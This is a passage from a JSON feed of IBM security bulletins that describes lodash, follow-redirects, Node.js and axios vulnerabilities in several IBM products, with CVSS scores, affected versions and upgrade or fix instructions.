"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2021-09-30T06:41:56", "id": "A67BBEE8D7ACC7113E69EA86A7657D4CC6D510A3407BCB843AB7301624C0D77A", "href": "https://www.ibm.com/support/pages/node/6494365", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:53:27", "description": "## Summary\n\nThere is vulnerability in lodash which affects IBM VM Recovery Manager HA GUI\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nVMRM HA GUI| V1.5.0.1 and below \n \n \n\n\n \n\n\n## Remediation/Fixes\n\nSecurity fix is available at the following location: \n\n<https://aix.software.ibm.com/aix/efixes/security/VMRMHA/>\n\nThe security fix contains filesets which should be installed over IBM VM Recovery Manager HA GUI 1.5.0.1\n\nFollowing command can be used to install these filesets:\n\n_installp -ac -FXYd. ksys.ui.agent ksys.ui.server ksys.ui.common_\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-29T13:49:25", "type": "ibm", "title": "Security Bulletin: Vulnerability in lodash affects IBM VM Recovery Manager HA GUI", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-23337"], "modified": "2021-09-29T13:49:25", "id": "C7D4749D45522C5407F869E674374544E27C48913CA6460504CFD68DC1061FB6", "href": "https://www.ibm.com/support/pages/node/6493751", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:36:02", "description": "## Summary\n\nThere is a vulnerability in Lodash that could allow an attacker to launch a DOS attack. The code is used by IBM Process Mining. This bulletin identifies the security fixes to apply to address the vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-1010266](<https://vulners.com/cve/CVE-2019-1010266>) \n** DESCRIPTION: **Lodash is vulnerable to a denial of service, caused by uncontrolled resource consumption in Date handler. By sending an overly long string, a local attacker could exploit this vulnerability to cause the application to stop responding. \nCVSS Base score: 4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168402](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168402>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request using a constructor payload, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/167415](<https://exchange.xforce.ibmcloud.com/vulnerabilities/167415>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2020-8203](<https://vulners.com/cve/CVE-2020-8203>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution attack. A remote attacker could exploit this vulnerability using the merge, mergeWith, and defaultsDeep functions to inject properties onto Object.prototype to crash the server and possibly execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/183560](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183560>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2018-16487](<https://vulners.com/cve/CVE-2018-16487>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a prototype pollution flaw. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to inject properties onto Object.prototype to cause a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/156530](<https://exchange.xforce.ibmcloud.com/vulnerabilities/156530>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2018-3721](<https://vulners.com/cve/CVE-2018-3721>) \n** DESCRIPTION: **Node.js lodash module could allow a remote attacker to bypass security restrictions, caused by a flaw in the defaultsDeep, 'merge, and mergeWith functions. By modifing the prototype of Object, an attacker could exploit this vulnerability to add or modify existing property that will exist on all objects. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/144603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/144603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Process Mining| 1.12.0.3 \n \n## Remediation/Fixes\n\n**Remediation/Fixes guidance**:\n\n**Product(s)**| **Version(s) number and/or range **| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Process Mining| 1.12.0.3| \n\n**Upgrade to version 1.12.0.4** \n \n1.Login to [PassPortAdvantage](<https://www-112.ibm.com/software/howtobuy/passportadvantage/homepage/paocustomer> \"\" ) \n \n2\\. Search for \n**M05JKML** Process Mining 1.12.0.4 Server Multiplatform Multilingual \n \n3\\. Download package\n\n4\\. Follow install instructions \n \n5\\. Repeat for **M05JJML** Process Mining 1.12.0.4 Client Windows Multilingual \n \n| | \n \n## Workarounds and Mitigations\n\nNone known\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2023-02-01T21:43:34", "type": "ibm", "title": "Security Bulletin: Vulnerability in Lodash affects IBM Process Mining (Multiple CVEs)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-16487", "CVE-2018-3721", "CVE-2019-1010266", "CVE-2019-10744", "CVE-2020-8203", "CVE-2021-23337"], "modified": "2023-02-01T21:43:34", "id": "FD3B6DACCDF2917EDE59BC97EFBE6A2BE91294E55463A289E02F5106FB9C2596", "href": "https://www.ibm.com/support/pages/node/6574021", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:46:35", "description": "## Summary\n\nIBM App Connect Enterprise and IBM Integration Bus ship with Node.js for which vulnerabilities were reported and have been addressed. Vulnerability details are listed below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>) \n** DESCRIPTION: **follow-redirects could allow a remote attacker to obtain sensitive information, caused by an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system. \nCVSS Base score: 8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM App Connect Enterprise| 12.0.1.0 - 12.0.3.0 \nIBM App Connect Enterprise| 11.0.0.0 - 11.0.0.16 \nIBM Integration Bus| 10.0.0.0 - 10.0.0.25 \n \n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability/vulnerabilities now by the applying the appropriate fix to IBM Integration Bus/IBM App Connect Enterprise**\n\n**Product(s)**\n\n| \n\n**Version(s)**\n\n| \n\n**APAR**\n\n| \n\n**Remediation / Fix** \n \n---|---|---|--- \n \nIBM App Connect Enterprise\n\n| \n\nv12.0.1.0 - v12.0.3.0\n\n| \n\nIT40700\n\n| \n\nThe APAR is available in fix pack 12.0.4.0 <https://www.ibm.com/support/pages/download-ibm-app-connect-enterprise-12040> \n \nIBM App Connect Enterprise\n\n| \n\nv11.0.0.0 - v11.0.0.16\n\n| \n\nIT40700\n\n| \n\nThe APAR is available in fix pack 11.0.0.17\n\n[IBM App Connect Enterprise Version V11-Fix Pack 11.0.0.17](<https://www.ibm.com/support/pages/node/6563499>) \n \nIBM Integration Bus\n\n| \n\nv10.0.0.0 - v10.0.0.25\n\n| \n\nIT40700\n\n| \n\nThe APAR is available in fix pack 10.0.0.26 <https://www.ibm.com/support/pages/ibm-integration-bus-v100-fix-pack-100026> \n \n## Workarounds and Mitigations\n\n**as per Remediation/Fixes plan**\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-12T15:35:26", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Node.js affect IBM App Connect Enterprise & IBM Integration Bus (CVE-2022-0155 & CVE-2022-0536)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155", "CVE-2022-0536"], "modified": "2022-05-12T15:35:26", "id": "3CD52A300CCFA76570B837A6AD424B08DA0B07EB9FDDB409947AA1A645F8C1BB", "href": "https://www.ibm.com/support/pages/node/6585706", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-28T01:44:15", "description": "## Summary\n\nIBM MQ Appliance has resolved follow-redirects vulnerabilities.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>) \n**DESCRIPTION: **follow-redirects could allow a remote attacker to obtain sensitive information, caused by an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system. \nCVSS Base score: 8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n**DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By using man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM MQ Appliance | 9.2 CD \nIBM MQ Appliance | 9.2 LTS \n \n## Remediation/Fixes\n\nThis vulnerability is addressed under IT41308 \n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**IBM MQ Appliance version 9.2 LTS**\n\nApply [9.2.0.6 fixpack](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+MQ+Appliance+M2000&function=fixId&fixids=9.2.0.6-IBM-MQ-Appliance-U0000+&includeSupersedes=1> \"9.2.0.6 fixpack\" ), or later firmware.\n\n**IBM MQ Appliance version 9.2 CD**\n\nUpgrade to [9.2.5 CD CSU01](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+MQ+Appliance+M2000&function=fixId&fixids=9.2.5-IBM-MQ-Appliance-CSU01+&includeSupersedes=1> \"9.2.5 CD CSU01\" ), or later firmware.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-07-14T15:02:42", "type": "ibm", "title": "Security Bulletin: IBM MQ Appliance is affected by follow-redirects vulnerabilities (CVE-2022-0155 and CVE-2022-0536)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155", "CVE-2022-0536"], "modified": "2022-07-14T15:02:42", "id": "4DE2C566A4DB221CD8E8337EDA25A0265351DB234C38F6A15A5E14F50CCBB4AD", "href": "https://www.ibm.com/support/pages/node/6603409", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-13T09:34:28", "description": "## Summary\n\nPotential information disclosure vulnerabilities in Node.js follow-redirects module (CVE-2022-0536, CVE-2022-0155) has been identified that may affect IBM Watson Assistant for IBM Cloud Pak for Data. Refer to details for additional information.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>) \n** DESCRIPTION: **follow-redirects could allow a remote attacker to obtain sensitive information, caused by an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system. \nCVSS Base score: 8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \n| Watson Assistant for IBM Cloud Pak for Data \n--- \n1.5.0, 4.0.0, 4.0.2, 4.0.4, 4.0.5, 4.0.6, 4.0.7, 4.0.8, 4.5.1, 4.5.3, 4.6 \n \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the latest (v4.6.2) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.6.2| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.6.2 release information)\n\n[https://www.ibm.com/docs/en/cloud-paks/cp-data/4.6.x](<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.5.x>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2023-02-07T21:34:20", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is vulnerable to Node.js follow-redirects module information disclosure vulnerabilities (CVE-2022-0536, CVE-2022-0155)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155", "CVE-2022-0536"], "modified": "2023-02-07T21:34:20", "id": "5FB88F97069B24B10212175375A1EE4C325F7D931FD5B3390FDDFC06BD6F90B8", "href": "https://www.ibm.com/support/pages/node/6953639", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-28T01:57:12", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data contains a vulnerable version of Node.js.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22884](<https://vulners.com/cve/CVE-2021-22884>) \n** DESCRIPTION: **Node.js is vulnerable to a denial of service, caused by an error when the allowlist includes &amp;#34;localhost6&amp;#34;. By controlling the victim&amp;#39;s DNS server or spoofing its responses, an attacker could exploit this vulnerability to bypass the DNS rebinding protection mechanism using the &amp;#34;localhost6&amp;#34; domain and cause a denial of service. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197191](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197191>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H) \n \n** CVEID: **[CVE-2021-22883](<https://vulners.com/cve/CVE-2021-22883>) \n** DESCRIPTION: **Node.js is vulnerable to a denial of service, caused by a file descriptor leak. By making multiple attempts to connect with an &amp;#39;unknownProtocol&amp;#39;, an attacker could exploit this vulnerability to lead to an excessive memory usage and cause the system to run out of memory. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197190](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197190>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-28500](<https://vulners.com/cve/CVE-2020-28500>) \n** DESCRIPTION: **Node.js lodash module is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) in the toNumber, trim and trimEnd functions. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196972](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196972>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nICP - Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 2.2.1 and apply 2.2.1 patch-2 \n\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-14T01:37:07", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Node.js", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500", "CVE-2021-22883", "CVE-2021-22884", "CVE-2021-23337"], "modified": "2021-05-14T01:37:07", "id": "91ACCACCF51183B22B704C13615BFD4650511CBD23CDA3DFFC59F6EA4243161F", "href": "https://www.ibm.com/support/pages/node/6450779", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-28T01:46:55", "description": "## Summary\n\nIBM Business Process Manager and IBM Business Automation Workflow are vulnerable to an information disclosure attack.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-3749](<https://vulners.com/cve/CVE-2021-3749>) \n** DESCRIPTION: **axios is vulnerable to a denial of service, caused by a regular expression denial of service (ReDoS) flaw in the trim function. By sending a specially-crafted regex input, a remote attacker could exploit this vulnerability to cause an application to consume an excessive amount of CPU. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208438](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208438>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-0155](<https://vulners.com/cve/CVE-2022-0155>) \n** DESCRIPTION: **follow-redirects could allow a remote attacker to obtain sensitive information, caused by an unauthorized actor. By sending a specially-crafted request, a remote authenticated attacker could exploit this vulnerability to obtain private personal information and use this information to launch further attacks against the affected system. \nCVSS Base score: 8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216974](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216974>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2022-0536](<https://vulners.com/cve/CVE-2022-0536>) \n** DESCRIPTION: **Node.js follow-redirects module could allow a remote authenticated attacker to obtain sensitive information, caused by a leakage of the Authorization header from the same hostname during HTTPS to HTTP redirection. By utilize man-in-the-middle attack techniques, an attacker could exploit this vulnerability to obtain Authorization header information, and use this information to launch further attacks against the affected system. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219551](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219551>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s)| Status \n---|---|--- \nIBM Business Automation Workflow traditional| V21.0.1 - V21.0.3 \nV20.0.0.1 - 